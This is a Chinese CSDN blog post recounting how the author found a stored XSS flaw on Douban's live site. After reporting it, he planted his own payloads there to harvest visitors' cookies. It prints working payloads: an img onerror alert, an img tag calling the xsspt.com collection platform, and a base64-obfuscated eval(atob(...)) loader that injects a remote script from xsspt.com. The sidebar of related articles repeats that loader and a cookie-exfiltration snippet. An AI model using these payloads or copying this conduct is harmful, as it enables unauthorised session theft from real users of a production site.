我在机缘巧合下发现豆瓣主站存储型XSS

最新推荐文章于 2021-04-13 08:27:43 发布
最新推荐文章于 2021-04-13 08:27:43 发布
阅读量564 收藏
点赞数
分类专栏: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40729671/article/details/104548321
版权

0x00 缘起

2/19晚上十点左右,我在这一天”忙碌”的网课生活中解放出来。因为傍晚挖到联想的漏洞,想着既然它们在漏洞盒子有项目那么应该有自己的应急响应平台吧。

然后我尝试百度:联想应急响应

 

 

我一个个的打开,当我打开豆瓣的网站时。怦然心动;是这样的

 

以我的惊天地泣鬼神的反应力,直接梭哈提交漏洞盒子。

0x0XSS

我开始挖掘这个xss是如何产生的,一个快捷键:Ctrl + U打开了前端源代码查看

因为xss的弹窗无非就是alert(),confirm()和prompt()

我就本着习惯先去查看了alert

 

很快就找到了罪魁语句:

<img src=\"x\" οnerrοr=\"alert('hello')\">然后我回到前端,查看是哪个用户插入的语句

开启我的F12,装逼功能(当然不是修改页面哈)

 

 

找到了真正的大佬

0x0XSS

我也满足一下自己的b格,给自己弹了一个b话十足的句子

于是呢,我就想着去xsspt创建项目,这样有人打开我就能梭哈一波了。

<img src=" https://xsspt.com/****** " οnerrοr="alert('我是帅哥南方')">

当我插入的时候重新访问网站时候,平台并没有接收到我的cookie

 

我就想着是不是过滤了,于是呢

<img src=x οnerrοr=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwczovL3hzc3B0LmNvbS93UU5qUE4/JytNYXRoLnJhbmRvbSgp'))>

我们可以对自己的payload做些手脚

然后插入,刷新。

 

 

说明:

文章仅用于思路方法学习,请勿用于非法用途

猫叔与鱼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
YXcms-含有存储XSS漏洞的源码包
03-17
存储XSSXSS攻击的一种类,这种漏洞通常发生在用户提交的数据被持久化存储在服务器上,并在后续请求中未经适当过滤或转义就被显示出来,从而允许攻击者植入恶意脚本。 【描述解析】 描述中的"亲测真实有效可用...
XSS注入学习小插曲
kekefen01的博客
10-31 229
之前发现了一个网的留言板功能可以实施保存XSS注入,昨天晚上又去看了一下这个网,结果发现这网被另一个哥们注入了 &amp;lt;dt class=&quot;hfinfo&quot;&amp;gt;&amp;lt;img src=&quot;x&quot; onerror=&quot;eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3
脚本攻击(XSS)
前行的博客
08-15 777
概念 XSS攻击,通常指通过'HTML注入'篡改了网页,插入恶意脚本,大多数是javascript或者指向脚本的链接,在用户浏览网页的时候,控制用户浏览器的一种攻击。要的攻击对象是当前用户的个人信息。 对于XSS攻击者来说,JavaScript工作在渲染后的浏览器环境中,无法控制用户浏览器发出的HTTP头。 XSS的三种类 反射XSS:特点是黑客需要诱使用户点击一个恶意链...
xss脚本绕过waf
a843538946的专栏
12-22 975
&lt;img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL0ZweWpnUz8nK01hdGgucmFuZG9tKCk='))&gt;   atob解密后是真正的js代码...
【漏洞学习——XSS豆瓣某处持久xss
Fly_鹏程万里
02-22 593
漏洞细节 个人空间相册..... 还有一个,没什么用的   参见:https://bugs.shuimugan.com/bug/view?bug_no=124719
记一次电信反射xss的挖掘与利用
weixin_30627381的博客
08-17 335
0X0、前言 早上起床,打开手机习惯性刷刷新闻,却发现网络无法连接,本以为是光猫出现了问题,后来发现是忘记续费,欠费了。 在网上充值完之后,等了有将近十分钟,网依旧没恢复。随打了个电话给客服,客服在后台帮忙刷新了一下数据,一分钟后网络就恢复了。 在我打了个非常满意评价后,客服发了个短信给我,短信内容是这样子的。 点开链接,页面跳转一下,发现是一个客户自检网络,修复网络故障的页...
YXcms-含有存储XSS漏洞的源码包(1).zip
12-31
YXcms是一个常见的内容管理系统,但在这个特定的版本——"YXcms-含有存储XSS漏洞的源码包(1).zip"中,存在一个严重的安全问题:存储脚本(Stored Cross-Site Scripting,简称存储XSS)漏洞。这种漏洞允许...
存储Xss成因及挖掘方法
02-21
存储Xss成因及挖掘方法
奇安信安全扫描漏洞解决路径遍历和存储xss和反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
存储XSS灰盒测试-01
最新发布
09-15
存储XSS是一种常见的Web应用安全漏洞,它允许攻击者将恶意脚本存储在服务器上,然后在其他用户访问时触发恶意脚本,从而实现攻击。存储XSS的危害性非常高,因此需要进行严格的检测和防护。 在这个课程中,我们...
渗透测试web安全 - XSS 最新的实用触发及绕过技巧
网络安全领域优质创作者
02-19 2607
希望在各位遇到难解决的WAF或XSS过滤器时,这份备忘录能够给大家提供一些帮助或灵感。作为例子,不能说100%完整,但是我相信这里提供的技术是2020年部分安全人员仍在使用的技术。 标签-属性分隔符 有些过滤器会“天真地认为”只有某些特定字符可以分隔标签及其属性,下面给出的是在Firefox和Chrome中能够使用的有效分隔符的完整列表: Decimal value URL En...
不要点进来,盗你CSDNCookie
AI的博客
09-16 557
(function(){(new Image()).src='http://xsspt.com/index.php?do=api&amp;id=jOVSk7&amp;location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&amp;toplocation='+escape(...
http://syy7.com/a/25.php,vue_element/vue_elementui.sql at 3ffdcb477ce3fbbc24cf1a4d7e3481a187023a02 ·...
热门推荐
weixin_34064233的博客
04-13 94万+
INSERT INTO `user_tb` VALUES ('1', '女', 'burtyang', 'C041580E1C6192B6084E03CE76D5C05C', '18', null, 'data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAwICQoJBwwKCQoNDAwOER0TERAQESMZGxUdKiUsKykl...
我学习上的一个小插曲
王一的专栏
07-14 979
 放暑假了,我可以自由了,但我却不知道自己要做什么,该做什么,或者说,我想让自己做太多的东西,而没有一些顺序了,最后,我选择了先去一家网络公司实习,锻炼一下,现在已在这家公司快半个月了,虽然公司小,但对我来说,我却不能应付,有许多东西,我都得再慢慢学习,自己也遇到了许多困难.这些日子里,我算是日夜工作和忙碌 .苦呀,不过,我相信在这一个月,我会学到很多东西,也能做很多东西.我要努力,加油.
XSS平台传输原理
Playwin
03-23 1855
前言:抽个时间,查看了一下自己搭的XSS平台(项目来源)传输数据的原理,究竟是怎样盗取cookie 生成一个盗取cookie的cookie.js 分析源码 cookie.js创建一个预加载对象,带着你的cookie等一些数据去访问服务器(xss平台) index.php接受你传过来的数据 测试 抓包,查看数据 总结 在能插入js代码的网页,插入恶意链接,利用该网的身份发出请...
【白帽子学习笔记8】DNS服务器与安全
python_LC_nohtyp的博客
06-04 562
【白帽子学习笔记7】DNS服务器与安全 1、DNS Domain Name Service 域名服务 作用:为客户机提供域名解析服务 2、域名组成 如“www.sina.com.cn”是一个域名,从严格意义上来说“sina.com.cn”才被称为域名(全球唯一),而“www”是机名 “机名.域名”称为完全限定域名(FQDN),一个域名下可以有多个机,域名全球唯一,那么“机名 .域名”肯定也全球唯一。 www.baidu.com. FQDN=机名.DNS后缀 FQDN(完整合格的域名) 3、监听端
十三、学习分布式爬虫之字体反爬
Mr_Little_li的博客
02-20 6214
字体反爬 字体反爬原理 网页开发者自己创造一种字体,因为在字体中每个文字都有其代号,那么以后在网页中不会直接显示这个文字的最终的效果,而是显示他的代号,因此即使获取到了网页中的文本内容,也只是获取到文字的代号,而不是文字本身。 因为创造字体费时费力,并且如果把中国3000多常用汉字都实现,那么这个字体将达到几十兆,也会影响网页的加载。一般情况下为了反爬虫,仅会针对0-9以及少数汉字进行单独创建,...
xss自动化攻击
weixin_30596023的博客
02-10 270
所需工具 【1.xssValidator】 【2.phantomjs】 【3.xss.js】 /** * This is a basic phantomJS script that will be used together * with the xssValidator burp extender. * * This script launc...
存储xss和反射xss有哪些异同点
05-12
1. 漏洞位置:存储 XSS 漏洞通常出现在 Web 应用程序的数据库、文件系统、内存中等存储位置,而反射 XSS 漏洞则出现在 Web 应用程序的请求参数中。 2. 攻击方式:存储 XSS 恶意代码通常会被存储到 Web 服务器...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值